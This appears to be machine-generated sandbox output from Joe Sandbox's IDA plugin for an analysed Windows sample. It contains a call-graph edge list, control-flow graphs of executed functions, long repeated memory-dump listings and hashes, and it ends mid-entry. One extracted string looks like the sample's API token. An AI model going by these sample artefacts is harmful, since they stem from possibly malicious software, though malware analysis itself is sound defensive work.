7606->7606 7617 389760 7606->7617 7608 3698f7 7610 369908 7608->7610 7621 366cc0 7608->7621 7610->7590 7611 369768 7611->7608 7611->7610 7612 389760 LdrInitializeThunk 7611->7612 7612->7608 7615 369c51 7613->7615 7630 3642b0 7615->7630 7616 369e05 7618 389780 7617->7618 7620 38989e 7618->7620 7624 385bb0 LdrInitializeThunk 7618->7624 7620->7611 7625 3895b0 7621->7625 7623 366d15 7624->7620 7627 3895d0 7625->7627 7626 38970e 7626->7623 7627->7626 7629 385bb0 LdrInitializeThunk 7627->7629 7629->7626 7631 3642c0 7630->7631 7632 389760 LdrInitializeThunk 7631->7632 7634 364319 7632->7634 7633 3643d7 7633->7616 7634->7633 7635 366cc0 LdrInitializeThunk 7634->7635 7635->7633 7801 35d760 7803 35d773 7801->7803 7802 3895b0 LdrInitializeThunk 7804 35d92d 7802->7804 7803->7802 7803->7803 7827 353be2 7828 353be9 7827->7828 7829 353ea3 7828->7829 7832 353e36 7828->7832 7833 385bb0 LdrInitializeThunk 7828->7833 7829->7832 7834 385bb0 LdrInitializeThunk 7829->7834 7833->7829 7834->7832 7706 383920 7707 38393c 7706->7707 7709 383a42 7707->7709 7710 385bb0 LdrInitializeThunk 7707->7710 7710->7709 7636 352f6f CoInitializeSecurity 7735 350228 7736 350242 7735->7736 7739 350455 7735->7739 7740 350308 7735->7740 7737 385700 2 API calls 7736->7737 7736->7739 7736->7740 7737->7739 7738 385700 2 API calls 7738->7740 7739->7738 7677 3568ab 7679 3568aa 7677->7679 7679->7677 7680 3834d0 7679->7680 7681 38359e 7680->7681 7682 3834e1 7680->7682 7681->7679 7682->7681 7684 385bb0 LdrInitializeThunk 7682->7684 7684->7681 7645 35d457 7646 3895b0 LdrInitializeThunk 7645->7646 7647 35d46b 7646->7647 7648 35d4a9 7647->7648 7650 35d47a 7647->7650 7652 35d4d6 7647->7652 7655 3898f0 7647->7655 7648->7650 7648->7652 7659 3899d0 7648->7659 7652->7650 7665 385bb0 LdrInitializeThunk 7652->7665 7654 35d6db 7657 389918 7655->7657 7656 38997e 7656->7648 7657->7656 7666 385bb0 LdrInitializeThunk 7657->7666 7661 3899f5 7659->7661 7660 389b0e 7660->7652 7663 389a5f 7661->7663 7667 385bb0 LdrInitializeThunk 7661->7667 7663->7660 7668 385bb0 LdrInitializeThunk 7663->7668 7665->7654 7666->7656 7667->7663 7668->7660 7544 34d110 7548 34d119 7544->7548 7545 34d2ee 7546 34d2e9 7553 3856e0 7546->7553 7548->7545 7548->7546 7552 352f10 CoInitialize 7548->7552 7556 387180 7553->7556 7555 3856e5 FreeLibrary 7555->7545 7557 387189 7556->7557 7557->7555 7813 356f91 7814 356fbc 7813->7814 7816 35702a 7814->7816 7819 385bb0 LdrInitializeThunk 7814->7819 7820 385bb0 LdrInitializeThunk 7816->7820 7818 3570d1 7819->7816 7820->7818 7821 350b93 7822 383220 RtlFreeHeap 7821->7822 7823 350b99 7822->7823 7563 3899d0 7565 3899f5 7563->7565 7564 389b0e 7567 389a5f 7565->7567 7569 385bb0 LdrInitializeThunk 7565->7569 7567->7564 7570 385bb0 LdrInitializeThunk 7567->7570 7569->7567 7570->7564 7711 35111d 7712 385700 2 API calls 7711->7712 7713 351127 7712->7713 7571 35049b 7576 350227 7571->7576 7573 385700 2 API calls 7575 350308 7573->7575 7574 350455 7574->7573 7576->7574 7576->7575 7577 385700 7576->7577 7578 38571b 7577->7578 7579 385797 7577->7579 7582 385729 7577->7582 7583 38578c 7577->7583 7578->7579 7578->7582 7578->7583 7581 383220 RtlFreeHeap 7579->7581 7580 385776 RtlReAllocateHeap 7580->7583 7581->7583 7582->7580 7583->7574 7714 35811b 7719 389b60 7714->7719 7716 3581ea 7718 35814a 7718->7716 7725 385bb0 LdrInitializeThunk 7718->7725 7721 389b85 7719->7721 7720 389c9e 7720->7718 7723 389bef 7721->7723 7726 385bb0 LdrInitializeThunk 7721->7726 7723->7720 7727 385bb0 LdrInitializeThunk 7723->7727 7725->7718 7726->7723 7727->7720 7685 357c84 7686 357c89 7685->7686 7687 383220 RtlFreeHeap 7686->7687 7688 357c96 7687->7688 7741 358e0d 7742 358e42 7741->7742 7744 358ea4 7742->7744 7747 385bb0 LdrInitializeThunk 7742->7747 7745 358fa3 7744->7745 7748 385bb0 LdrInitializeThunk 7744->7748 7747->7742 7748->7744 7749 384a40 7753 384a77 7749->7753 7750 384ad8 7751 384b6d 7750->7751 7758 383e30 7750->7758 7753->7750 7757 385bb0 LdrInitializeThunk 7753->7757 7756 384b29 7756->7751 7762 385bb0 LdrInitializeThunk 7756->7762 7757->7750 7760 383e45 7758->7760 7759 383ed0 7759->7756 7760->7759 7763 385bb0 LdrInitializeThunk 7760->7763 7762->7751 7763->7759 7835 3583ce 7836 358403 7835->7836 7838 35846d 7836->7838 7839 385bb0 LdrInitializeThunk 7836->7839 7839->7836 7637 359809 7640 389410 7637->7640 7639 359848 7641 389430 7640->7641 7642 38954e 7641->7642 7644 385bb0 LdrInitializeThunk 7641->7644 7642->7639 7644->7642 7788 35e30b 7789 35e320 7788->7789 7794 35e34e 7788->7794 7790 383e30 LdrInitializeThunk 7789->7790 7790->7794 7791 35e560 7792 383220 RtlFreeHeap 7791->7792 7793 35e5a2 7792->7793 7794->7791 7795 383e30 LdrInitializeThunk 7794->7795 7797 35e41c 7795->7797 7796 383e30 LdrInitializeThunk 7796->7797 7797->7791 7797->7796 7798 383220 RtlFreeHeap 7797->7798 7799 35e56a 7797->7799 7798->7797 7800 383220 RtlFreeHeap 7799->7800 7800->7791

                                                                        Executed Functions

                                                                        Function 0034FCA0 Relevance: 6.6, Strings: 5, Instructions: 373COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 236 34fca0-34fcda 237 34fcdc-34fcdf 236->237 238 34fd0b-34fe22 236->238 239 34fce0-34fd09 call 352690 237->239 240 34fe24 238->240 241 34fe5b-34fe8c 238->241 239->238 245 34fe30-34fe59 call 352760 240->245 242 34feb6-34fec5 call 350b50 241->242 243 34fe8e-34fe8f 241->243 251 34feca-34fecf 242->251 246 34fe90-34feb4 call 352700 243->246 245->241 246->242 254 34ffe4-34ffe6 251->254 255 34fed5-34fef8 251->255 258 3501b1-3501bb 254->258 256 34fefa 255->256 257 34ff2b-34ff2d 255->257 259 34ff00-34ff29 call 3527e0 256->259 260 34ff30-34ff3a 257->260 259->257 262 34ff41-34ff49 260->262 263 34ff3c-34ff3f 260->263 264 3501a2-3501ad call 383220 262->264 265 34ff4f-34ff76 262->265 263->260 263->262 264->258 267 34ff78 265->267 268 34ffab-34ffb5 265->268 270 34ff80-34ffa9 call 352840 267->270 271 34ffb7-34ffbb 268->271 272 34ffeb 268->272 270->268 276 34ffc7-34ffcb 271->276 274 34ffed-34ffef 272->274 277 34fff5-35002c 274->277 278 35019a 274->278 276->278 280 34ffd1-34ffd8 276->280 281 35002e-35002f 277->281 282 35005b-350065 277->282 278->264 283 34ffde 280->283 284 34ffda-34ffdc 280->284 285 350030-350059 call 3528a0 281->285 286 3500a4 282->286 287 350067-35006f 282->287 288 34ffc0-34ffc5 283->288 289 34ffe0-34ffe2 283->289 284->283 285->282 292 3500a6-3500a8 286->292 291 350087-35008b 287->291 288->274 288->276 289->288 291->278 295 350091-350098 291->295 292->278 293 3500ae-3500c5 292->293 296 3500c7 293->296 297 3500fb-350102 293->297 298 35009e 295->298 299 35009a-35009c 295->299 300 3500d0-3500f9 call 352900 296->300 301 350104-35010d 297->301 302 350130-35013c 297->302 303 350080-350085 298->303 304 3500a0-3500a2 298->304 299->298 300->297 306 350117-35011b 301->306 307 3501c2-3501c7 302->307 303->291 303->292 304->303 306->278 309 35011d-350124 306->309 307->264 310 350126-350128 309->310 311 35012a 309->311 310->311 312 350110-350115 311->312 313 35012c-35012e 311->313 312->306 314 350141-350143 312->314 313->312 314->278 315 350145-35015b 314->315 315->307 316 35015d-35015f 315->316 317 350163-350166 316->317 318 3501bc 317->318 319 350168-350188 call 352030 317->319 318->307 322 350192-350198 319->322 323 35018a-350190 319->323 322->307 323->317 323->322
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HZlidKlpcv_p0sfMpNIO76uVyDFPfvMjvRK5J6.GgLc-1728871031-0.0.1.1-/api$J|BJ$V$VY^_$t
                                                                        • API String ID: 0-420900265
                                                                        • Opcode ID: da2223a9f76258e2210277bb7cf7702059458371ee9373b8e2d3729f56a6c472
                                                                        • Instruction ID: f164f768fbe1d3e6f92efe49f34457ad5f8ae249e702a924f3571585803acf81
                                                                        • Opcode Fuzzy Hash: da2223a9f76258e2210277bb7cf7702059458371ee9373b8e2d3729f56a6c472
                                                                        • Instruction Fuzzy Hash: F2D1677450C3809BD316DF149490A1FBBE1AB96B45F18882CF8C99B262D336DE49DB93
                                                                        Function 00385700 Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 340 385700-385714 341 385729-38574a 340->341 342 38571b-385722 340->342 343 38578c-385795 call 3831a0 340->343 344 3857b0 340->344 345 3857b2 340->345 346 385797-3857a5 call 383220 340->346 347 38574c-38574f 341->347 348 385776-38578a RtlReAllocateHeap 341->348 342->341 342->344 342->345 342->346 351 3857b4-3857b9 343->351 344->345 345->351 346->344 352 385750-385774 call 385b30 347->352 348->351 352->348
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00385784
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 93a10a580107c38721cb5e4681d4fe49ed23d0511590ea6a770eed8a07fdc6fb
                                                                        • Instruction ID: 5e33cdcb85dbfd0453367db03d9c024de667eadf9a20da62269bd672ba6bcc2c
                                                                        • Opcode Fuzzy Hash: 93a10a580107c38721cb5e4681d4fe49ed23d0511590ea6a770eed8a07fdc6fb
                                                                        • Instruction Fuzzy Hash: 62115E7591C340EBC302AF28E845A1BBBF9AF96B10F158868F4C49B311D336D915CB93
                                                                        Function 0035049B Relevance: .3, Instructions: 264COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 397 35049b-350515 call 34c9f0 401 350417-350430 397->401 402 350356 397->402 403 350311-350332 397->403 404 350370-35037e 397->404 405 3503d0-3503d7 397->405 406 350393-350397 397->406 407 350472-350477 397->407 408 35051c-35051e 397->408 409 35035f-350367 397->409 410 3503be 397->410 411 3503de-3503e3 397->411 412 350339-35034f 397->412 413 35045b-350469 call 385700 397->413 414 3503fb-350414 397->414 415 350227-35023b 397->415 416 350246-350260 397->416 417 350386-35038c 397->417 418 350440-350458 call 385700 397->418 419 350480 397->419 420 350242-350244 397->420 421 350482-350484 397->421 422 3503ec-3503f4 397->422 423 350308-35030c 397->423 401->418 402->409 403->401 403->402 403->404 403->405 403->406 403->407 403->409 403->410 403->411 403->412 403->413 403->414 403->417 403->418 403->419 403->421 403->422 404->417 405->401 405->406 405->407 405->411 405->414 405->417 405->419 405->421 405->422 440 3503a0-3503b7 406->440 407->419 429 350520 408->429 409->404 410->405 411->422 412->401 412->402 412->404 412->405 412->406 412->407 412->409 412->410 412->411 412->413 412->414 412->417 412->418 412->419 412->421 412->422 413->407 414->401 415->401 415->402 415->403 415->404 415->405 415->406 415->407 415->409 415->410 415->411 415->412 415->413 415->414 415->416 415->417 415->418 415->419 415->420 415->421 415->422 415->423 424 350294 416->424 425 350262 416->425 417->406 417->407 417->419 417->421 418->413 430 350296-3502bd 420->430 427 35048d-350496 421->427 422->406 422->407 422->414 422->419 422->421 423->427 424->430 431 350270-350292 call 352eb0 425->431 427->429 441 350529-350b30 429->441 433 3502bf 430->433 434 3502ea-350301 430->434 431->424 443 3502c0-3502e8 call 352e70 433->443 434->401 434->402 434->403 434->404 434->405 434->406 434->407 434->409 434->410 434->411 434->412 434->413 434->414 434->417 434->418 434->419 434->421 434->422 434->423 440->401 440->405 440->406 440->407 440->410 440->411 440->413 440->414 440->417 440->418 440->419 440->421 440->422 443->434
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a2f388ff5ddb8a1eeb76f91801b284dec7629bffd531d5676cde70ae00a3f25
